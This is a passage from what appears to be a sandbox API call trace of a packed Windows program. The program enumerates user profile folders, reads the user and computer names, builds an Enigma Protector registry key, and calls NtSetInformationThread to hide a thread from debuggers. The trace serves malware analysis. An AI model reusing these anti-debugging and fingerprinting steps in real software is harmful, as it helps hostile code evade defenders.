nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0x10ef150 [0174.227] FindNextFileW (in: hFindFile=0x10ef150, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0 [0174.227] GetLastError () returned 0x12 [0174.227] FindClose (in: hFindFile=0x10ef150 | out: hFindFile=0x10ef150) returned 1 [0174.228] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\", psz="c:\\Users\\kEecfMwgj\\AppData", len=0x1a | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData") returned 1 [0174.228] SysReAllocStringLen (in: pbstr=0x28fdc0*="c:\\Users\\kEecfMwgj\\AppData", psz="c:\\Users\\kEecfMwgj\\AppData\\", len=0x1b | out: pbstr=0x28fdc0*="c:\\Users\\kEecfMwgj\\AppData\\") returned 1 [0174.228] SysReAllocStringLen (in: pbstr=0x28fae8*="appdata", psz="roaming", len=0x7 | out: pbstr=0x28fae8*="roaming") returned 1 [0174.228] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\roaming" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xc7b73660, ftLastAccessTime.dwHighDateTime=0x1da4ad7, ftLastWriteTime.dwLowDateTime=0xc7b73660, ftLastWriteTime.dwHighDateTime=0x1da4ad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0x10ef150 [0174.229] FindNextFileW (in: hFindFile=0x10ef150, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xc7b73660, ftLastAccessTime.dwHighDateTime=0x1da4ad7, ftLastWriteTime.dwLowDateTime=0xc7b73660, ftLastWriteTime.dwHighDateTime=0x1da4ad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0 [0174.229] GetLastError () returned 0x12 [0174.229] FindClose (in: hFindFile=0x10ef150 | out: hFindFile=0x10ef150) returned 1 [0174.229] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming", len=0x22 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 1 [0174.229] SysReAllocStringLen (in: pbstr=0x28fdc0*="c:\\Users\\kEecfMwgj\\AppData\\Roaming", psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\", len=0x23 | out: pbstr=0x28fdc0*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\") returned 1 [0174.231] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\", len=0x23 | out: pbstr=0x28fad8*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\") returned 1 [0174.231] SysReAllocStringLen (in: pbstr=0x28fdc0*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming", len=0x22 | out: pbstr=0x28fdc0*="c:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 1 [0174.231] SysReAllocStringLen (in: pbstr=0x28fdc4*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming", len=0x22 | out: pbstr=0x28fdc4*="c:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 1 [0174.232] SysReAllocStringLen (in: pbstr=0x3420088*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\", len=0x23 | out: pbstr=0x3420088*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\") returned 1 [0174.232] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x3423b40 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 0x0 [0174.236] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\AppData\\Local", cchLength=0x20 | out: lpsz="c:\\users\\keecfmwgj\\appdata\\local") returned 0x20 [0174.236] SysReAllocStringLen (in: pbstr=0x342009c*=0x0, psz="c:\\users\\keecfmwgj\\appdata\\local", len=0x20 | out: pbstr=0x342009c*="c:\\users\\keecfmwgj\\appdata\\local") returned 1 [0174.237] SysReAllocStringLen (in: pbstr=0x34200a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x34200a0*="c:") returned 1 [0174.237] SysReAllocStringLen (in: pbstr=0x33e0834*=0x0, psz="users", len=0x5 | out: pbstr=0x33e0834*="users") returned 1 [0174.238] SysReAllocStringLen (in: pbstr=0x34200d4*=0x0, psz="keecfmwgj", len=0x9 | out: pbstr=0x34200d4*="keecfmwgj") returned 1 [0174.238] SysReAllocStringLen (in: pbstr=0x34200e0*=0x0, psz="appdata", len=0x7 | out: pbstr=0x34200e0*="appdata") returned 1 [0174.238] SysReAllocStringLen (in: pbstr=0x34200ec*=0x0, psz="local", len=0x5 | out: pbstr=0x34200ec*="local") returned 1 [0174.239] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0174.239] SysReAllocStringLen (in: pbstr=0x28fdb4*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fdb4*="c:\\") returned 1 [0174.239] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="users", len=0x5 | out: pbstr=0x28fae8*="users") returned 1 [0174.239] FindFirstFileW (in: lpFileName="c:\\users" (normalized: "c:\\users"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x10ef150 [0174.240] FindNextFileW (in: hFindFile=0x10ef150, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0 [0174.240] GetLastError () returned 0x12 [0174.240] FindClose (in: hFindFile=0x10ef150 | out: hFindFile=0x10ef150) returned 1 [0174.240] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Users", len=0x8 | out: pbstr=0x28fadc*="c:\\Users") returned 1 [0174.240] SysReAllocStringLen (in: pbstr=0x28fdb4*="c:\\Users", psz="c:\\Users\\", len=0x9 | out: pbstr=0x28fdb4*="c:\\Users\\") returned 1 [0174.240] SysReAllocStringLen (in: pbstr=0x28fae8*="users", psz="keecfmwgj", len=0x9 | out: pbstr=0x28fae8*="keecfmwgj") returned 1 [0174.241] FindFirstFileW (in: lpFileName="c:\\Users\\keecfmwgj" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0x10ef150 [0174.241] FindNextFileW (in: hFindFile=0x10ef150, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0 [0174.241] GetLastError () returned 0x12 [0174.241] FindClose (in: hFindFile=0x10ef150 | out: hFindFile=0x10ef150) returned 1 [0174.242] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\", psz="c:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj") returned 1 [0174.242] SysReAllocStringLen (in: pbstr=0x28fdb4*="c:\\Users\\kEecfMwgj", psz="c:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x28fdb4*="c:\\Users\\kEecfMwgj\\") returned 1 [0174.242] SysReAllocStringLen (in: pbstr=0x28fae8*="keecfmwgj", psz="appdata", len=0x7 | out: pbstr=0x28fae8*="appdata") returned 1 [0174.242] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\appdata" (normalized: "c:\\users\\keecfmwgj\\appdata"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0x10ef150 [0174.242] FindNextFileW (in: hFindFile=0x10ef150, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0 [0174.242] GetLastError () returned 0x12 [0174.242] FindClose (in: hFindFile=0x10ef150 | out: hFindFile=0x10ef150) returned 1 [0174.243] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\", psz="c:\\Users\\kEecfMwgj\\AppData", len=0x1a | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData") returned 1 [0174.243] SysReAllocStringLen (in: pbstr=0x28fdb4*="c:\\Users\\kEecfMwgj\\AppData", psz="c:\\Users\\kEecfMwgj\\AppData\\", len=0x1b | out: pbstr=0x28fdb4*="c:\\Users\\kEecfMwgj\\AppData\\") returned 1 [0174.243] SysReAllocStringLen (in: pbstr=0x28fae8*="appdata", psz="local", len=0x5 | out: pbstr=0x28fae8*="local") returned 1 [0174.243] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\local" (normalized: "c:\\users\\keecfmwgj\\appdata\\local"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe31a0b60, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xe31a0b60, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0x10ef150 [0174.244] FindNextFileW (in: hFindFile=0x10ef150, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe31a0b60, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xe31a0b60, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0 [0174.244] GetLastError () returned 0x12 [0174.244] FindClose (in: hFindFile=0x10ef150 | out: hFindFile=0x10ef150) returned 1 [0174.244] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Local", len=0x20 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Local") returned 1 [0174.244] SysReAllocStringLen (in: pbstr=0x28fdb4*="c:\\Users\\kEecfMwgj\\AppData\\Local", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\", len=0x21 | out: pbstr=0x28fdb4*="c:\\Users\\kEecfMwgj\\AppData\\Local\\") returned 1 [0174.246] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\", len=0x21 | out: pbstr=0x28fad8*="c:\\Users\\kEecfMwgj\\AppData\\Local\\") returned 1 [0174.246] SysReAllocStringLen (in: pbstr=0x28fdb4*="c:\\Users\\kEecfMwgj\\AppData\\Local\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Local", len=0x20 | out: pbstr=0x28fdb4*="c:\\Users\\kEecfMwgj\\AppData\\Local") returned 1 [0174.246] SysReAllocStringLen (in: pbstr=0x28fdb8*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Local", len=0x20 | out: pbstr=0x28fdb8*="c:\\Users\\kEecfMwgj\\AppData\\Local") returned 1 [0174.247] SysReAllocStringLen (in: pbstr=0x342008c*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\", len=0x21 | out: pbstr=0x342008c*="c:\\Users\\kEecfMwgj\\AppData\\Local\\") returned 1 [0174.247] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3423b40 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0174.251] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj", cchLength=0x12 | out: lpsz="c:\\users\\keecfmwgj") returned 0x12 [0174.251] SysReAllocStringLen (in: pbstr=0x342009c*=0x0, psz="c:\\users\\keecfmwgj", len=0x12 | out: pbstr=0x342009c*="c:\\users\\keecfmwgj") returned 1 [0174.251] SysReAllocStringLen (in: pbstr=0x34200a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x34200a0*="c:") returned 1 [0174.251] SysReAllocStringLen (in: pbstr=0x33e0834*=0x0, psz="users", len=0x5 | out: pbstr=0x33e0834*="users") returned 1 [0174.269] SysReAllocStringLen (in: pbstr=0x34200d4*=0x0, psz="keecfmwgj", len=0x9 | out: pbstr=0x34200d4*="keecfmwgj") returned 1 [0174.269] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0174.269] SysReAllocStringLen (in: pbstr=0x28fda8*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fda8*="c:\\") returned 1 [0174.269] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="users", len=0x5 | out: pbstr=0x28fae8*="users") returned 1 [0174.270] FindFirstFileW (in: lpFileName="c:\\users" (normalized: "c:\\users"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x10ef150 [0174.270] FindNextFileW (in: hFindFile=0x10ef150, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0 [0174.270] GetLastError () returned 0x12 [0174.270] FindClose (in: hFindFile=0x10ef150 | out: hFindFile=0x10ef150) returned 1 [0174.271] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Users", len=0x8 | out: pbstr=0x28fadc*="c:\\Users") returned 1 [0174.271] SysReAllocStringLen (in: pbstr=0x28fda8*="c:\\Users", psz="c:\\Users\\", len=0x9 | out: pbstr=0x28fda8*="c:\\Users\\") returned 1 [0174.271] SysReAllocStringLen (in: pbstr=0x28fae8*="users", psz="keecfmwgj", len=0x9 | out: pbstr=0x28fae8*="keecfmwgj") returned 1 [0174.271] FindFirstFileW (in: lpFileName="c:\\Users\\keecfmwgj" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0x10ef150 [0174.271] FindNextFileW (in: hFindFile=0x10ef150, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0 [0174.272] GetLastError () returned 0x12 [0174.272] FindClose (in: hFindFile=0x10ef150 | out: hFindFile=0x10ef150) returned 1 [0174.272] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\", psz="c:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj") returned 1 [0174.272] SysReAllocStringLen (in: pbstr=0x28fda8*="c:\\Users\\kEecfMwgj", psz="c:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x28fda8*="c:\\Users\\kEecfMwgj\\") returned 1 [0174.273] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x28fad8*="c:\\Users\\kEecfMwgj\\") returned 1 [0174.274] SysReAllocStringLen (in: pbstr=0x28fda8*="c:\\Users\\kEecfMwgj\\", psz="c:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28fda8*="c:\\Users\\kEecfMwgj") returned 1 [0174.274] SysReAllocStringLen (in: pbstr=0x28fdac*=0x0, psz="c:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28fdac*="c:\\Users\\kEecfMwgj") returned 1 [0174.274] SysReAllocStringLen (in: pbstr=0x3420090*=0x0, psz="c:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x3420090*="c:\\Users\\kEecfMwgj\\") returned 1 [0174.274] VirtualFree (lpAddress=0x3424000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0174.279] GetLastError () returned 0x0 [0174.279] SetLastError (dwErrCode=0x0) [0174.279] GetLastError () returned 0x0 [0174.280] SetLastError (dwErrCode=0x0) [0174.280] GetLastError () returned 0x0 [0174.280] SetLastError (dwErrCode=0x0) [0174.281] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0174.281] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0174.281] GetCurrentThread () returned 0xfffffffe [0174.281] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0174.282] GetLastError () returned 0x0 [0174.282] SetLastError (dwErrCode=0x0) [0174.282] GetLastError () returned 0x0 [0174.282] SetLastError (dwErrCode=0x0) [0174.282] GetLastError () returned 0x0 [0174.283] SetLastError (dwErrCode=0x0) [0174.283] GetLastError () returned 0x0 [0174.283] SetLastError (dwErrCode=0x0) [0174.283] GetLastError () returned 0x0 [0174.283] SetLastError (dwErrCode=0x0) [0174.284] GetLastError () returned 0x0 [0174.284] SetLastError (dwErrCode=0x0) [0174.284] GetLastError () returned 0x0 [0174.284] SetLastError (dwErrCode=0x0) [0174.284] GetLastError () returned 0x0 [0174.284] SetLastError (dwErrCode=0x0) [0174.284] GetLastError () returned 0x0 [0174.285] SetLastError (dwErrCode=0x0) [0174.285] GetLastError () returned 0x0 [0174.285] SetLastError (dwErrCode=0x0) [0174.285] GetLastError () returned 0x0 [0174.286] SetLastError (dwErrCode=0x0) [0174.286] GetLastError () returned 0x0 [0174.286] SetLastError (dwErrCode=0x0) [0174.286] GetLastError () returned 0x0 [0174.286] SetLastError (dwErrCode=0x0) [0174.286] GetLastError () returned 0x0 [0174.286] SetLastError (dwErrCode=0x0) [0174.287] GetLastError () returned 0x0 [0174.287] SetLastError (dwErrCode=0x0) [0174.307] GetLastError () returned 0x0 [0174.307] SetLastError (dwErrCode=0x0) [0174.307] GetLastError () returned 0x0 [0174.307] SetLastError (dwErrCode=0x0) [0174.307] GetLastError () returned 0x0 [0174.307] SetLastError (dwErrCode=0x0) [0174.308] GetLastError () returned 0x0 [0174.308] SetLastError (dwErrCode=0x0) [0174.308] GetLastError () returned 0x0 [0174.308] SetLastError (dwErrCode=0x0) [0174.308] GetLastError () returned 0x0 [0174.308] SetLastError (dwErrCode=0x0) [0174.308] VirtualQuery (in: lpAddress=0x401000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x401000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x2c000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0174.309] VirtualQuery (in: lpAddress=0x423000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x423000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0xa000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0174.309] VirtualQuery (in: lpAddress=0x425000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x425000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x8000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0174.309] VirtualQuery (in: lpAddress=0x400000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0174.309] GetLastError () returned 0x0 [0174.309] SetLastError (dwErrCode=0x0) [0174.309] GetLastError () returned 0x0 [0174.310] SetLastError (dwErrCode=0x0) [0174.310] GetLastError () returned 0x0 [0174.310] SetLastError (dwErrCode=0x0) [0174.310] GetUserNameA (in: lpBuffer=0x557338, pcbBuffer=0x557334 | out: lpBuffer="kEecfMwgj", pcbBuffer=0x557334) returned 1 [0174.430] GetLastError () returned 0x0 [0174.430] SetLastError (dwErrCode=0x0) [0174.430] GetLastError () returned 0x0 [0174.430] SetLastError (dwErrCode=0x0) [0174.430] GetLastError () returned 0x0 [0174.431] SetLastError (dwErrCode=0x0) [0174.431] GetLastError () returned 0x0 [0174.431] SetLastError (dwErrCode=0x0) [0174.431] GetLastError () returned 0x0 [0174.431] SetLastError (dwErrCode=0x0) [0174.431] GetLastError () returned 0x0 [0174.432] SetLastError (dwErrCode=0x0) [0174.432] GetComputerNameA (in: lpBuffer=0x55744c, nSize=0x557448 | out: lpBuffer="Q9IATRKPRH", nSize=0x557448) returned 1 [0174.433] GetLastError () returned 0xcb [0174.433] SetLastError (dwErrCode=0xcb) [0174.433] GetLastError () returned 0xcb [0174.434] SetLastError (dwErrCode=0xcb) [0174.434] GetLastError () returned 0xcb [0174.434] SetLastError (dwErrCode=0xcb) [0174.434] GetLastError () returned 0xcb [0174.435] SetLastError (dwErrCode=0xcb) [0174.435] GetLastError () returned 0xcb [0174.435] SetLastError (dwErrCode=0xcb) [0174.435] GetLastError () returned 0xcb [0174.435] SetLastError (dwErrCode=0xcb) [0174.436] GetLastError () returned 0xcb [0174.436] SetLastError (dwErrCode=0xcb) [0174.436] GetLastError () returned 0xcb [0174.436] SetLastError (dwErrCode=0xcb) [0174.436] GetLastError () returned 0xcb [0174.437] SetLastError (dwErrCode=0xcb) [0174.437] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="Software\\Enigma Protector\\%.8x%.8x-%.8x%.8x", cbMultiByte=43, lpWideCharStr=0x28ee68, cchWideChar=2047 | out: lpWideCharStr="Software\\Enigma Protector\\%.8x%.8x-%.8x%.8x") returned 43 [0174.437] GetLastError () returned 0x0 [0174.437] SetLastError (dwErrCode=0x0) [0174.437] GetLastError () returned 0x0 [0174.437] SetLastError (dwErrCode=0x0) [0174.438] GetLastError () returned 0x0 [0174.438] SetLastError (dwErrCode=0x0) [0174.438] GetLastError () returned 0x0 [0174.438] SetLastError (dwErrCode=0x0) [0174.438] GetLastError () returned 0x0 [0174.438] SetLastError (dwErrCode=0x0) [0174.439] GetLastError () returned 0x0 [0174.439] SetLastError (dwErrCode=0x0) [0174.439] GetLastError () returned 0x0 [0174.444] SetLastError (dwErrCode=0x0) [0174.444] SysReAllocStringLen (in: pbstr=0x33f1c74*=0x0, psz="Software\\Enigma Protector\\29AEB4A0365755F6-B862CAE984EA4D0E", len=0x3b | out: pbstr=0x33f1c74*="Software\\Enigma Protector\\29AEB4A0365755F6-B862CAE984EA4D0E") returned 1 [0174.444] GetLastError () returned 0x0 [0174.444] SetLastError (dwErrCode=0x0) [0174.444] GetLastError () returned 0x0 [0174.445] SetLastError (dwErrCode=0x0) [0174.445] GetLastError () returned 0x0 [0174.445] SetLastError (dwErrCode=0x0) [0174.445] VirtualQuery (in: lpAddress=0x401000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x401000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x2c000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0174.445] VirtualQuery (in: lpAddress=0x423000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x423000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0xa000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0174.445] VirtualQuery (in: lpAddress=0x425000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x425000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x8000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0174.445] VirtualQuery (in: lpAddress=0x400000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0174.445] GetLastError () returned 0x0 [0174.446] SetLastError (dwErrCode=0x0) [0174.446] GetLastError () returned 0x0 [0174.446] SetLastError (dwErrCode=0x0) [0174.446] 